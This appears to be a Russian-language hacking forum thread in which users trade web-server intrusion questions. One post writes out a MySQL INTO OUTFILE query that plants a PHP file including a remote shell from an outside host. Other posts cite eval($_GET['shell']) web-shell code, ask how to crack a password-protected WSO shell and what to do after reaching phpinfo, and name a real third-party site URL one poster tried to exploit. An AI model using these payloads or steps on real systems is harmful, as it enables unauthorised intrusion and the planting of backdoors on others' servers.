Такая ситуация: Есть PhpMyAdin права полный Root Делаю запрос вида select '<? @include("http://site.ru/files/shell.txt"); ?>' into outfile 'D:/WWW/files/shell.php'; Создаеться файл .php, но когда захожу на него, там пустой белый лист!!! А когда делаю запрос select '<? phpinfo(); ?>' into outfile 'D:/WWW/files/info.php'; выводиться полный phpinfo!! что может быть не так?
я извиняюсь, мой пост затерялся, поетому спрошу ещё раз. с php вобще ничего не показывает. возможно. как в этом случае можно глянуть какая функция используется.
попугай, eval($_GET['shell']); тоже ничего не дал. Ошибки только выдает! типа Parse error: syntax error, unexpected '<' in D:\WWW\files\files.php(1) : assert code(1) : eval()'d code on line 1
Спасибо большое. Но чё то или я туплю или даже хз, но в логах ngnix , но в логах чё то не появляется мой запрос
есть шелл с парольом.. как моjно наыти пароль ? и пароль изменилось не стандартниы.. напримерь в wso парол root а здес что то друqое .. как наыти ??
Да phpinfo то выводит без проблем!! П ричем var не работает, только cmd! И что ещо можно сделать через команду cmd ??
ммм.. а как скрипт будет различать опасные файлы по твоему? он же работает на стороне клиента..исходники ему не видны
http://slil.ru/29081007 вот, если я правильно понял. Ищит залитые шеллы на сторонних сайтах по их имени (r57.php,c99.php,c100.php и тд). Если на своем сервере нужно найти модифицированные файлы или шеллы, то вот http://slil.ru/29081093
Подскажите дальнейшие действия, есть доступ к phpinfo.php там естесвенно подробная инфа и пути к сайту что дальше делать? может ссылку на какую нибудь статью или еще что то... проверка всего сайта не sql , php иньекций и не Xss не вывело
Не смог раскрутить. Кто что скажет? Code: chatmovil.terra.es/index.php?section=channel_list&viewing_category_type=1
